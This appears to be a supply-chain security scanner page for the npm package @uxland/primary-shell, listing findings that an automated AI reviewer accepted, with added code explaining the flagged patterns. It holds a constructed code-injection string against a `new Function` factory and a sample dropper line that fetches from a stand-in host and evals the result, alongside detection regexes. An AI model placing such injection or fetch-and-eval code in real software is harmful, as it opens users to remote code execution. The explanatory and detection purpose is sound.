@uxland/primary-shell
Primaria Shell
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | net-exec-file:dist/index-BUnSpNVB.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the app's documented event-class factory and React runtime, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-BUnSpNVB.js | AI (source-diff): Vite-generated bundle with hashed filename; minification is expected for this build toolchain. | ai | |
| source-diff | obfuscated-file:dist/index-DasFWYhc.js | AI (source-diff): Standard Vite-bundled minified output; long lines are expected in bundled dist files for this package. | ai | |
| source-diff | net-exec-file:dist/index-DasFWYhc.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the React shell bundle and event factory; not dropper behavior. | ai | |
| source-diff | net-exec-file:dist/index-8_KLfK7r.js | AI (source-diff): Network calls and dynamic code in a React app bundle are expected; no dropper pattern in sample. | ai | |
| source-diff | obfuscated-file:dist/index-8_KLfK7r.js | AI (source-diff): Standard Vite-minified bundle with source map; not obfuscated malware. | ai | |
| source-diff | obfuscated-file:dist/index-B0BnyHR2.js | AI (source-diff): Vite-bundled minified output; long lines are standard bundle artifact, not obfuscation. | ai | |
| source-diff | net-exec-file:dist/index-B0BnyHR2.js | AI (source-diff): Network calls and dynamic code in a React app bundle are expected; no dropper pattern in sample. | ai | |
| source-diff | net-exec-file:dist/index-HxUANPyC.js | AI (source-diff): Network calls and dynamic code in bundled frontend app are expected; no dropper pattern in sample. | ai | |
| source-diff | obfuscated-file:dist/index-HxUANPyC.js | AI (source-diff): Standard Vite bundle output; sample shows legitimate React/reflect-metadata code, not obfuscation. | ai | |
| source-diff | net-exec-file:dist/index-CW9SRbzE.js | AI (source-diff): Network calls and dynamic code (new Function) are part of normal React/inversify bundle, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-CW9SRbzE.js | AI (source-diff): Standard Vite build output; minified bundle is expected for this package. | ai | |
| source-diff | net-exec-file:dist/index-B7XP7G0f.js | AI (source-diff): Network calls and new Function() are part of the React shell app bundle, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-B7XP7G0f.js | AI (source-diff): Standard Vite bundle output; long lines are minified but not obfuscated — readable source map included. | ai | |
| source-diff | net-exec-file:dist/index-DSWQpDr0.js | AI (source-diff): Bundled SPA shell; network calls and Function() globalThis polyfill are expected in dist output. | ai | |
| source-diff | obfuscated-file:dist/index-DSWQpDr0.js | AI (source-diff): Vite bundle output with source map; minified but not obfuscated. Stable pattern for this package. | ai | |
| source-diff | obfuscated-file:dist/index-CNpXjSPp.js | AI (source-diff): Vite build bundle; minified output is expected for this package's dist folder. | ai | |
| source-diff | net-exec-file:dist/index-CNpXjSPp.js | AI (source-diff): Bundle includes reflect-metadata polyfill (Function constructor) and React app network calls; not malicious. | ai | |
| source-diff | net-exec-file:dist/index-CsqWoBVE.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the app bundle's normal operation, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-CsqWoBVE.js | AI (source-diff): Standard Vite-bundled minified output for a React shell app; not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/index-BPXzFbQm.js | AI (source-diff): Vite-bundled frontend shell; minified dist output with accompanying source map is expected for this package. | ai | |
| source-diff | net-exec-file:dist/index-BPXzFbQm.js | AI (source-diff): Network calls and dynamic code (new Function for event class creation) are part of the app's documented broker pattern, not dropper behavior. | ai | |
| source-diff | net-exec-file:dist/index-0V-xXwce.js | AI (source-diff): Network calls and dynamic code (new Function for event class factory) are part of the documented shell app bundle, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-0V-xXwce.js | AI (source-diff): Vite-bundled React/Lit shell app; minified dist output is expected and accompanied by a source map. | ai | |
| source-diff | net-exec-file:dist/index-mgf5fUfq.js | AI (source-diff): Network calls and dynamic code (new Function) are part of React/reflect-metadata bundle, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-mgf5fUfq.js | AI (source-diff): Vite-bundled frontend dist file; long lines are minified bundle output, not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/index-Dnyofefj.js | AI (source-diff): Large Vite bundle output; sample shows standard minified React code, not obfuscation. | ai | |
| source-diff | net-exec-file:dist/index-Dnyofefj.js | AI (source-diff): Network+exec pattern in a bundled shell app is expected; no dropper behavior in sample. | ai | |
| source-diff | net-exec-file:dist/index-Z7V9O2zV.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the bundled app runtime, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-Z7V9O2zV.js | AI (source-diff): Vite-bundled React app output; minified lines are expected build artifacts, not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/index-td5IxyX5.js | AI (source-diff): Vite-bundled minified output with source map; not obfuscation. | ai | |
| source-diff | net-exec-file:dist/index-td5IxyX5.js | AI (source-diff): Bundle includes reflect-metadata's Function() and axios; expected for this app shell. | ai | |
| source-diff | obfuscated-file:dist/index-BPEC-whC.js | AI (source-diff): Standard Vite bundle output; long lines are minified but not obfuscated — readable source and .map file both present. | ai | |
| source-diff | net-exec-file:dist/index-BPEC-whC.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the app's event-class factory and React runtime, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-kl9Zgtus.js | AI (source-diff): Standard Vite-bundled output; sample shows readable React/reflect-metadata code, not obfuscation. | ai | |
| source-diff | net-exec-file:dist/index-kl9Zgtus.js | AI (source-diff): Network calls and dynamic code in a frontend shell bundle are expected; no dropper pattern in sample. | ai | |
| source-diff | net-exec-file:dist/index-ayzo4OJo.js | AI (source-diff): Network calls and dynamic code in a React frontend bundle are normal; no dropper pattern in the sample. | ai | |
| source-diff | obfuscated-file:dist/index-ayzo4OJo.js | AI (source-diff): Standard Vite-minified React bundle; long lines are expected in bundled output, not obfuscation. | ai | |
| source-diff | net-exec-file:dist/index-CXxEmHmi.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the bundled React app and event factory pattern, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-CXxEmHmi.js | AI (source-diff): Vite-bundled frontend shell; large minified dist files are expected for this package. | ai | |
| source-diff | net-exec-file:dist/index-B9gGnkza.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the bundled app framework, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-B9gGnkza.js | AI (source-diff): Standard Vite bundle output; minified lines are expected for this build-tool-based package. | ai | |
| source-diff | net-exec-file:dist/index-DHrGHdzq.js | AI (source-diff): Network calls and dynamic code (new Function) are part of the app shell's documented event-class factory; no dropper pattern. | ai | |
| source-diff | obfuscated-file:dist/index-DHrGHdzq.js | AI (source-diff): Vite-bundled frontend output; minification is expected for this package's dist artifacts. | ai | |
| bogus-package | bogus-package | AI (bogus-package): Internal/private shell app; sparse README and no keywords are expected for org-internal packages. | ai | |
| semgrep | semgrep:new-function-constructor | AI (semgrep): Used to dynamically create named event classes from controlled event name strings; not arbitrary user input. | ai | |
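The pattern behind the semgrep acceptance, as an added example (not the package's own code): a factory that builds a named event class by splicing a name string into source text compiled with `new Function`. The acceptance rests on the name being controlled, so the example shows what happens when that assumption fails, the identifier check that makes the factory safe, and the equivalent that needs no dynamic code at all. `BaseEvent`, the factory names and the injected string are constructed for the example; the reserved-word list is partial.

```javascript
// Added example (not the package's code): the "named event class from a string"
// pattern that triggers semgrep's new-function-constructor rule, why the name must
// be validated, and how to get a named class without new Function at all.
class BaseEvent {
  constructor(payload) { this.payload = payload; }
}

const IDENTIFIER_RE = /^[A-Za-z_$][A-Za-z0-9_$]*$/;
// Partial list; enough to reject names that would change the meaning of the source.
const RESERVED = new Set(['class', 'extends', 'return', 'function', 'var', 'let', 'const',
  'new', 'this', 'super', 'import', 'export', 'yield', 'await', 'delete', 'typeof', 'void', 'in']);

// The pattern as scanners see it: the name is spliced into source text and compiled.
// Harmless when `name` is a compile-time constant; code injection when it is not.
function makeEventClassViaFunction(name, Base = BaseEvent) {
  return new Function('Base', `const C = class ${name} extends Base {}; return C;`)(Base);
}

// Same factory with the only input validated as a bare identifier first.
function makeEventClassValidated(name, Base = BaseEvent) {
  if (!IDENTIFIER_RE.test(name) || RESERVED.has(name)) throw new TypeError(`invalid event name: ${name}`);
  return makeEventClassViaFunction(name, Base);
}

// Equivalent without any dynamic code: a class's `name` property is configurable,
// so the class can be given its name after the fact.
function makeEventClass(name, Base = BaseEvent) {
  if (!IDENTIFIER_RE.test(name) || RESERVED.has(name)) throw new TypeError(`invalid event name: ${name}`);
  const C = class extends Base {};
  Object.defineProperty(C, 'name', { value: name });
  return C;
}

// Constructed payload: a "name" that closes the class expression, runs a statement,
// and opens another class so the generated source still parses.
const INJECTED_NAME = 'X extends Base {}; globalThis.__injected = true; class Y';

// Returns true if the unvalidated factory executed the injected statement.
function demonstrateInjection() {
  delete globalThis.__injected;
  makeEventClassViaFunction(INJECTED_NAME);
  return globalThis.__injected === true;
}

// Returns true if the validated factory refuses the name.
function validatedRejects(name) {
  try { makeEventClassValidated(name); return false; } catch (e) { return e instanceof TypeError; }
}
```

The `Object.defineProperty` form gives the same `C.name` and the same `instanceof` behaviour as the `new Function` version, so a maintainer who wants the semgrep finding to go away for good can switch to it without changing call sites; the validation regex is the minimum if `new Function` stays.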
Versions (showing 34 of 34)
| Version | Deps | Published |
|---|---|---|
| 7.44.2 | 2 / 20 | |
| 7.44.1 | 2 / 20 | |
| 7.43.5 | 2 / 20 | |
| 7.43.4 | 2 / 20 | |
| 7.43.3 | 2 / 20 | |
| 7.43.2 | 2 / 20 | |
| 7.43.1 | 2 / 20 | |
| 7.43.0 | 2 / 20 | |
| 7.42.0 | 2 / 20 | |
| 7.41.8 | 2 / 20 | |
| 7.41.7 | 2 / 20 | |
| 7.41.6 | 2 / 20 | |
| 7.41.5 | 2 / 20 | |
| 7.41.4 | 2 / 20 | |
| 7.41.3 | 2 / 20 | |
| 7.41.2 | 2 / 20 | |
| 7.41.1 | 2 / 20 | |
| 7.41.0 | 2 / 20 | |
| 7.40.4 | 2 / 20 | |
| 7.40.3 | 2 / 20 | |
| 7.40.2 | 2 / 20 | |
| 7.40.1 | 2 / 20 | |
| 7.40.0 | 2 / 20 | |
| 7.39.0 | 2 / 20 | |
| 7.38.5 | 2 / 20 | |
| 7.38.4 | 2 / 20 | |
| 7.38.3 | 2 / 20 | |
| 7.38.2 | 2 / 20 | |
| 7.38.1 | 2 / 20 | |
| 7.38.0 | 2 / 20 | |
| 7.37.2 | 2 / 20 | |
| 7.37.1 | 2 / 20 | |
| 7.37.0 | 2 / 20 | |
| 7.36.5 | 2 / 20 | |
v7.44.2
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.44.1
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.43.5
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.43.4
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.43.3
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.43.2
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.43.1
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.43.0
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.42.0
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.8
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.7
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.6
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.5
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.4
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.3
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.2
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.41.1
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.41.0
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.40.4
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.40.3
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.40.2
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.40.1
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.40.0
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.39.0
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.38.5
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.38.4
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.38.3
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.38.2
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.38.1
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.38.0
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.37.2
3 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v7.37.1
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.37.0
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v7.36.5
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
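The two per-version findings that recur above ("lines over 3000 chars" and "network calls plus dynamic code execution") are cheap textual heuristics, and the accepted-risk notes explain why every Vite chunk of this package trips both. The added example below (not the scanner's code; its real rules are not published on this page) reproduces the two checks over constructed input and adds the follow-up a reviewer actually wants: whether a network response is fed into `eval`/`Function`, and whether the chunk references a source map. The regexes are illustrative; minified code can chain calls in ways a 200-character window misses, so a negative from the data-flow check is a reason to read the code, not proof.

```javascript
// Added example (not the scanner's code): the two source-diff heuristics that fire on
// every dist/ chunk of this package, plus the follow-up checks a reviewer makes before
// accepting them. Both sample chunks are constructed, not taken from the package.
const NETWORK_RE = /\b(?:fetch|XMLHttpRequest|WebSocket|axios|sendBeacon)\b/;
const DYNAMIC_CODE_RE = /\b(?:eval|new\s+Function|Function)\s*\(/;
const SOURCE_MAP_RE = /\/\/[#@]\s*sourceMappingURL=(\S+)/;
// Crude data-flow hint: a response body consumer followed within 200 chars by eval/Function.
const NET_TO_EXEC_RE = /\.(?:text|json)\(\)[\s\S]{0,200}?\b(?:eval|Function)\s*\(/;
const LONG_LINE = 3000;

function scanBundle(text) {
  const longestLine = text.split('\n').reduce((m, l) => Math.max(m, l.length), 0);
  const mapRef = SOURCE_MAP_RE.exec(text);
  return {
    obfuscatedFile: longestLine > LONG_LINE,                          // the "obfuscated-file" rule
    netExecFile: NETWORK_RE.test(text) && DYNAMIC_CODE_RE.test(text), // the "net-exec-file" rule
    responseFedToExec: NET_TO_EXEC_RE.test(text),                     // what a dropper actually does
    sourceMap: mapRef ? mapRef[1] : null,
    longestLine,
  };
}

// Triage the way the accepted-risk notes on this page do: the pair of rules alone only
// says "bundled app"; network data reaching eval/Function is the signal that blocks.
function triage(text) {
  const r = scanBundle(text);
  if (r.responseFedToExec) return 'block';
  if (r.netExecFile || r.obfuscatedFile) return r.sourceMap ? 'accept-with-review' : 'review';
  return 'clean';
}

// Constructed stand-in for a Vite chunk: one very long minified line that contains a
// reflect-metadata style global lookup via Function(...) and an ordinary fetch, then a
// source map reference.
const BENIGN_CHUNK = [
  'var g=typeof globalThis=="object"?globalThis:Function("return this")();' +
    'var a=1;'.repeat(500) +
    'fetch("/api/config").then(function(r){return r.json()}).then(function(c){g.__cfg=c});',
  '//# sourceMappingURL=index-example.js.map',
].join('\n');

// Constructed dropper: short, no source map, and the fetched body goes straight to eval.
const DROPPER_CHUNK =
  'var u="https://example.invalid/payload";fetch(u).then(function(r){return r.text()}).then(function(t){eval(t)});';
```

Run over the two samples, the benign chunk trips both page rules (long line, network plus `Function(`) but has a source map and no response-to-exec flow, which is exactly the situation the accepted-risk rows describe; the dropper trips only the net-exec rule yet is the one to block. A source map reference is only worth something if the map is actually published and covers the chunk, so the `accept-with-review` outcome still means opening the file.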